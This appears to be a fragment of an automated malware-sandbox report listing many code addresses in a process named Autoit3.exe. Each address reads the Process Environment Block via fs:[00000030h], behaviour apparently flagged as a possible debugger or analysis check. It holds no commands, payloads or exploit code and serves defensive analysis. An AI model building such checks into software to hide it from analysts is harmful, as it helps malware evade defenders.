Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043437B0 mov eax, dword ptr fs:[00000030h]	6_3_043437B0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042E07A4 mov eax, dword ptr fs:[00000030h]	6_3_042E07A4
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042E07A4 mov eax, dword ptr fs:[00000030h]	6_3_042E07A4
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042E07A4 mov eax, dword ptr fs:[00000030h]	6_3_042E07A4
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043207A0 mov ecx, dword ptr fs:[00000030h]	6_3_043207A0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043287A0 mov eax, dword ptr fs:[00000030h]	6_3_043287A0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043287A0 mov eax, dword ptr fs:[00000030h]	6_3_043287A0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432E7AC mov eax, dword ptr fs:[00000030h]	6_3_0432E7AC
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042E5787 mov eax, dword ptr fs:[00000030h]	6_3_042E5787
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042C7780 mov eax, dword ptr fs:[00000030h]	6_3_042C7780
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433A786 mov eax, dword ptr fs:[00000030h]	6_3_0433A786
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435C780 mov eax, dword ptr fs:[00000030h]	6_3_0435C780
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043207F0 mov eax, dword ptr fs:[00000030h]	6_3_043207F0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043207F0 mov eax, dword ptr fs:[00000030h]	6_3_043207F0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D07F3 mov eax, dword ptr fs:[00000030h]	6_3_042D07F3
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433C7D0 mov eax, dword ptr fs:[00000030h]	6_3_0433C7D0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433C7D0 mov eax, dword ptr fs:[00000030h]	6_3_0433C7D0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432F7D8 mov eax, dword ptr fs:[00000030h]	6_3_0432F7D8
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042CB7C0 mov ebx, dword ptr fs:[00000030h]	6_3_042CB7C0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042CB7C0 mov eax, dword ptr fs:[00000030h]	6_3_042CB7C0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433F020 mov eax, dword ptr fs:[00000030h]	6_3_0433F020
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E011 mov eax, dword ptr fs:[00000030h]	6_3_0435E011
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042AB006 mov eax, dword ptr fs:[00000030h]	6_3_042AB006
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042AB006 mov eax, dword ptr fs:[00000030h]	6_3_042AB006
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042AC010 mov ecx, dword ptr fs:[00000030h]	6_3_042AC010
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04324054 mov eax, dword ptr fs:[00000030h]	6_3_04324054
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04324054 mov eax, dword ptr fs:[00000030h]	6_3_04324054
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04324054 mov eax, dword ptr fs:[00000030h]	6_3_04324054
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042B5054 mov eax, dword ptr fs:[00000030h]	6_3_042B5054
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042DF0A0 mov eax, dword ptr fs:[00000030h]	6_3_042DF0A0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042DF0A0 mov eax, dword ptr fs:[00000030h]	6_3_042DF0A0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042DF0A0 mov eax, dword ptr fs:[00000030h]	6_3_042DF0A0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04338090 mov eax, dword ptr fs:[00000030h]	6_3_04338090
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E092 mov eax, dword ptr fs:[00000030h]	6_3_0435E092
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434909E mov edi, dword ptr fs:[00000030h]	6_3_0434909E
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435C0F0 mov eax, dword ptr fs:[00000030h]	6_3_0435C0F0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435C0F0 mov eax, dword ptr fs:[00000030h]	6_3_0435C0F0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043540F0 mov eax, dword ptr fs:[00000030h]	6_3_043540F0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043540F0 mov eax, dword ptr fs:[00000030h]	6_3_043540F0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043730D2 mov eax, dword ptr fs:[00000030h]	6_3_043730D2
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043730D2 mov eax, dword ptr fs:[00000030h]	6_3_043730D2
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432511D mov eax, dword ptr fs:[00000030h]	6_3_0432511D
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04330100 mov ecx, dword ptr fs:[00000030h]	6_3_04330100
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04320144 mov eax, dword ptr fs:[00000030h]	6_3_04320144
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04320144 mov eax, dword ptr fs:[00000030h]	6_3_04320144
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043461B4 mov eax, dword ptr fs:[00000030h]	6_3_043461B4
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043461B4 mov eax, dword ptr fs:[00000030h]	6_3_043461B4
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043461B4 mov eax, dword ptr fs:[00000030h]	6_3_043461B4
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043461B4 mov eax, dword ptr fs:[00000030h]	6_3_043461B4
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043461B4 mov eax, dword ptr fs:[00000030h]	6_3_043461B4
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043461B4 mov eax, dword ptr fs:[00000030h]	6_3_043461B4
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043461B4 mov ecx, dword ptr fs:[00000030h]	6_3_043461B4
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A21AC mov eax, dword ptr fs:[00000030h]	6_3_042A21AC
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042C81A4 mov eax, dword ptr fs:[00000030h]	6_3_042C81A4
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042C81A4 mov eax, dword ptr fs:[00000030h]	6_3_042C81A4
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043761BE mov eax, dword ptr fs:[00000030h]	6_3_043761BE
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432C193 mov eax, dword ptr fs:[00000030h]	6_3_0432C193
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04338190 mov eax, dword ptr fs:[00000030h]	6_3_04338190
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04338190 mov ecx, dword ptr fs:[00000030h]	6_3_04338190
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04338190 mov eax, dword ptr fs:[00000030h]	6_3_04338190
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04338190 mov eax, dword ptr fs:[00000030h]	6_3_04338190
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04338190 mov eax, dword ptr fs:[00000030h]	6_3_04338190
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04338190 mov eax, dword ptr fs:[00000030h]	6_3_04338190
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434B188 mov ecx, dword ptr fs:[00000030h]	6_3_0434B188
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E18A mov eax, dword ptr fs:[00000030h]	6_3_0435E18A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436B222 mov eax, dword ptr fs:[00000030h]	6_3_0436B222
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D6230 mov eax, dword ptr fs:[00000030h]	6_3_042D6230
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042AF208 mov eax, dword ptr fs:[00000030h]	6_3_042AF208
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435E211 mov eax, dword ptr fs:[00000030h]	6_3_0435E211
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435A205 mov eax, dword ptr fs:[00000030h]	6_3_0435A205
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435A205 mov ecx, dword ptr fs:[00000030h]	6_3_0435A205
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435A205 mov eax, dword ptr fs:[00000030h]	6_3_0435A205
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04361264 mov eax, dword ptr fs:[00000030h]	6_3_04361264
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04361264 mov eax, dword ptr fs:[00000030h]	6_3_04361264
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04361264 mov eax, dword ptr fs:[00000030h]	6_3_04361264
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04361264 mov eax, dword ptr fs:[00000030h]	6_3_04361264
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04323266 mov eax, dword ptr fs:[00000030h]	6_3_04323266
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A8250 mov eax, dword ptr fs:[00000030h]	6_3_042A8250
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043752A7 mov eax, dword ptr fs:[00000030h]	6_3_043752A7
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433E2A0 mov eax, dword ptr fs:[00000030h]	6_3_0433E2A0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433E2A0 mov eax, dword ptr fs:[00000030h]	6_3_0433E2A0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04368292 mov eax, dword ptr fs:[00000030h]	6_3_04368292
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042E0290 mov ecx, dword ptr fs:[00000030h]	6_3_042E0290
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432B2E0 mov eax, dword ptr fs:[00000030h]	6_3_0432B2E0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043672D6 mov eax, dword ptr fs:[00000030h]	6_3_043672D6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043672D6 mov eax, dword ptr fs:[00000030h]	6_3_043672D6
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432C2D1 mov eax, dword ptr fs:[00000030h]	6_3_0432C2D1
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042C02DC mov eax, dword ptr fs:[00000030h]	6_3_042C02DC
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432F320 mov ecx, dword ptr fs:[00000030h]	6_3_0432F320
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04375322 mov eax, dword ptr fs:[00000030h]	6_3_04375322
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436B315 mov eax, dword ptr fs:[00000030h]	6_3_0436B315
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436230F mov eax, dword ptr fs:[00000030h]	6_3_0436230F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436230F mov eax, dword ptr fs:[00000030h]	6_3_0436230F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436230F mov eax, dword ptr fs:[00000030h]	6_3_0436230F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436230F mov eax, dword ptr fs:[00000030h]	6_3_0436230F
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04325308 mov eax, dword ptr fs:[00000030h]	6_3_04325308
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D136D mov eax, dword ptr fs:[00000030h]	6_3_042D136D
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04320370 mov ecx, dword ptr fs:[00000030h]	6_3_04320370
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04320370 mov eax, dword ptr fs:[00000030h]	6_3_04320370
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04320370 mov eax, dword ptr fs:[00000030h]	6_3_04320370
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04320370 mov eax, dword ptr fs:[00000030h]	6_3_04320370
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042B7370 mov eax, dword ptr fs:[00000030h]	6_3_042B7370
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042B7370 mov eax, dword ptr fs:[00000030h]	6_3_042B7370
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433A354 mov eax, dword ptr fs:[00000030h]	6_3_0433A354
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A1384 mov eax, dword ptr fs:[00000030h]	6_3_042A1384
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A1384 mov eax, dword ptr fs:[00000030h]	6_3_042A1384
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432B386 mov esi, dword ptr fs:[00000030h]	6_3_0432B386
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432B386 mov eax, dword ptr fs:[00000030h]	6_3_0432B386
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432B386 mov eax, dword ptr fs:[00000030h]	6_3_0432B386
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432C387 mov eax, dword ptr fs:[00000030h]	6_3_0432C387
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043383F0 mov eax, dword ptr fs:[00000030h]	6_3_043383F0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042E23CD mov esi, dword ptr fs:[00000030h]	6_3_042E23CD
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432E3CA mov eax, dword ptr fs:[00000030h]	6_3_0432E3CA
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432E3CA mov eax, dword ptr fs:[00000030h]	6_3_0432E3CA
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043733CB mov eax, dword ptr fs:[00000030h]	6_3_043733CB
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_043733CB mov eax, dword ptr fs:[00000030h]	6_3_043733CB
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D23D0 mov eax, dword ptr fs:[00000030h]	6_3_042D23D0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04332C25 mov eax, dword ptr fs:[00000030h]	6_3_04332C25
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04332C25 mov eax, dword ptr fs:[00000030h]	6_3_04332C25
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04332C25 mov eax, dword ptr fs:[00000030h]	6_3_04332C25
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042ABC00 mov eax, dword ptr fs:[00000030h]	6_3_042ABC00
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042ABC18 mov eax, dword ptr fs:[00000030h]	6_3_042ABC18
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433EC40 mov eax, dword ptr fs:[00000030h]	6_3_0433EC40
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433EC40 mov eax, dword ptr fs:[00000030h]	6_3_0433EC40
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04359C40 mov ecx, dword ptr fs:[00000030h]	6_3_04359C40
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D7C50 mov eax, dword ptr fs:[00000030h]	6_3_042D7C50
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435DC4A mov eax, dword ptr fs:[00000030h]	6_3_0435DC4A
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432BCB1 mov eax, dword ptr fs:[00000030h]	6_3_0432BCB1
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432BCB1 mov eax, dword ptr fs:[00000030h]	6_3_0432BCB1
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432BCB1 mov ecx, dword ptr fs:[00000030h]	6_3_0432BCB1
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432BCB1 mov ecx, dword ptr fs:[00000030h]	6_3_0432BCB1
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434ECA3 mov ecx, dword ptr fs:[00000030h]	6_3_0434ECA3
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434ECA3 mov ecx, dword ptr fs:[00000030h]	6_3_0434ECA3
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434ECA3 mov eax, dword ptr fs:[00000030h]	6_3_0434ECA3
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434CCAB mov eax, dword ptr fs:[00000030h]	6_3_0434CCAB
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434CCAB mov eax, dword ptr fs:[00000030h]	6_3_0434CCAB
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434CCAB mov eax, dword ptr fs:[00000030h]	6_3_0434CCAB
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434CCAB mov eax, dword ptr fs:[00000030h]	6_3_0434CCAB
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04358C90 mov eax, dword ptr fs:[00000030h]	6_3_04358C90
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04358C90 mov eax, dword ptr fs:[00000030h]	6_3_04358C90
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D2C80 mov eax, dword ptr fs:[00000030h]	6_3_042D2C80
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A4CD0 mov eax, dword ptr fs:[00000030h]	6_3_042A4CD0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04320D10 mov eax, dword ptr fs:[00000030h]	6_3_04320D10
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04320D10 mov ecx, dword ptr fs:[00000030h]	6_3_04320D10
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04338D10 mov eax, dword ptr fs:[00000030h]	6_3_04338D10
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04338D10 mov eax, dword ptr fs:[00000030h]	6_3_04338D10
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D6D0B mov eax, dword ptr fs:[00000030h]	6_3_042D6D0B
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432BD00 mov eax, dword ptr fs:[00000030h]	6_3_0432BD00
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432BD00 mov eax, dword ptr fs:[00000030h]	6_3_0432BD00
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432BD00 mov eax, dword ptr fs:[00000030h]	6_3_0432BD00
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0433ED00 mov eax, dword ptr fs:[00000030h]	6_3_0433ED00
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04332D75 mov eax, dword ptr fs:[00000030h]	6_3_04332D75
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04332D75 mov eax, dword ptr fs:[00000030h]	6_3_04332D75
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434FD7D mov eax, dword ptr fs:[00000030h]	6_3_0434FD7D
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434FD7D mov eax, dword ptr fs:[00000030h]	6_3_0434FD7D
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434FD7D mov ecx, dword ptr fs:[00000030h]	6_3_0434FD7D
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0434FD7D mov eax, dword ptr fs:[00000030h]	6_3_0434FD7D
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D5D60 mov eax, dword ptr fs:[00000030h]	6_3_042D5D60
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432FD60 mov eax, dword ptr fs:[00000030h]	6_3_0432FD60
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432FD60 mov eax, dword ptr fs:[00000030h]	6_3_0432FD60
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432FD60 mov eax, dword ptr fs:[00000030h]	6_3_0432FD60
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0429DD40 mov eax, dword ptr fs:[00000030h]	6_3_0429DD40
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435DDBB mov eax, dword ptr fs:[00000030h]	6_3_0435DDBB
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04359DA1 mov eax, dword ptr fs:[00000030h]	6_3_04359DA1
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04371D92 mov eax, dword ptr fs:[00000030h]	6_3_04371D92
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042E0D90 mov eax, dword ptr fs:[00000030h]	6_3_042E0D90
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04326DF7 mov eax, dword ptr fs:[00000030h]	6_3_04326DF7
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436ADF9 mov eax, dword ptr fs:[00000030h]	6_3_0436ADF9
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042DADC8 mov eax, dword ptr fs:[00000030h]	6_3_042DADC8
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A3DDA mov eax, dword ptr fs:[00000030h]	6_3_042A3DDA
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A3DDA mov eax, dword ptr fs:[00000030h]	6_3_042A3DDA
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A3DDA mov eax, dword ptr fs:[00000030h]	6_3_042A3DDA
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A3DDA mov eax, dword ptr fs:[00000030h]	6_3_042A3DDA
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A5DD5 mov ecx, dword ptr fs:[00000030h]	6_3_042A5DD5
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04326E20 mov ecx, dword ptr fs:[00000030h]	6_3_04326E20
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042C8E37 mov eax, dword ptr fs:[00000030h]	6_3_042C8E37
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042C8E37 mov eax, dword ptr fs:[00000030h]	6_3_042C8E37
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A7E00 mov eax, dword ptr fs:[00000030h]	6_3_042A7E00
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042A7E00 mov eax, dword ptr fs:[00000030h]	6_3_042A7E00
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D5E03 mov eax, dword ptr fs:[00000030h]	6_3_042D5E03
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_042D5E03 mov eax, dword ptr fs:[00000030h]	6_3_042D5E03
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0431FE00 mov eax, dword ptr fs:[00000030h]	6_3_0431FE00
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04328E00 mov eax, dword ptr fs:[00000030h]	6_3_04328E00
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04337E00 mov eax, dword ptr fs:[00000030h]	6_3_04337E00
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04337E00 mov eax, dword ptr fs:[00000030h]	6_3_04337E00
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04337E00 mov eax, dword ptr fs:[00000030h]	6_3_04337E00
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04337E00 mov ecx, dword ptr fs:[00000030h]	6_3_04337E00
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04328E70 mov eax, dword ptr fs:[00000030h]	6_3_04328E70
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04328E70 mov eax, dword ptr fs:[00000030h]	6_3_04328E70
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04328E70 mov eax, dword ptr fs:[00000030h]	6_3_04328E70
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04328E70 mov eax, dword ptr fs:[00000030h]	6_3_04328E70
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04328E70 mov eax, dword ptr fs:[00000030h]	6_3_04328E70
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04328E70 mov eax, dword ptr fs:[00000030h]	6_3_04328E70
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04328E70 mov eax, dword ptr fs:[00000030h]	6_3_04328E70
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04329E60 mov eax, dword ptr fs:[00000030h]	6_3_04329E60
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04347E6C mov eax, dword ptr fs:[00000030h]	6_3_04347E6C
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436CE6C mov eax, dword ptr fs:[00000030h]	6_3_0436CE6C
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0436CE6C mov eax, dword ptr fs:[00000030h]	6_3_0436CE6C
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04367E41 mov eax, dword ptr fs:[00000030h]	6_3_04367E41
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04367E41 mov eax, dword ptr fs:[00000030h]	6_3_04367E41
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04367E41 mov eax, dword ptr fs:[00000030h]	6_3_04367E41
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04367E41 mov eax, dword ptr fs:[00000030h]	6_3_04367E41
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0429FE51 mov eax, dword ptr fs:[00000030h]	6_3_0429FE51
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04373EB7 mov eax, dword ptr fs:[00000030h]	6_3_04373EB7
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432CEB0 mov eax, dword ptr fs:[00000030h]	6_3_0432CEB0
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04358E9E mov eax, dword ptr fs:[00000030h]	6_3_04358E9E
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04344E85 mov eax, dword ptr fs:[00000030h]	6_3_04344E85
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04344E85 mov eax, dword ptr fs:[00000030h]	6_3_04344E85
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04344E85 mov eax, dword ptr fs:[00000030h]	6_3_04344E85
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04344E85 mov eax, dword ptr fs:[00000030h]	6_3_04344E85
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04344E85 mov eax, dword ptr fs:[00000030h]	6_3_04344E85
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04358EE2 mov eax, dword ptr fs:[00000030h]	6_3_04358EE2
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435DEC8 mov eax, dword ptr fs:[00000030h]	6_3_0435DEC8
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0435BF34 mov eax, dword ptr fs:[00000030h]	6_3_0435BF34
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432FF30 mov eax, dword ptr fs:[00000030h]	6_3_0432FF30
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_0432FF30 mov eax, dword ptr fs:[00000030h]	6_3_0432FF30
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04346F30 mov eax, dword ptr fs:[00000030h]	6_3_04346F30
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04346F30 mov eax, dword ptr fs:[00000030h]	6_3_04346F30
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04346F30 mov eax, dword ptr fs:[00000030h]	6_3_04346F30
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04346F30 mov eax, dword ptr fs:[00000030h]	6_3_04346F30
Source: C:\bpzs\Autoit3.exe	Code function: 6_3_04346F30 mov eax, dword ptr fs:[00000030h]	6_3_04346F30
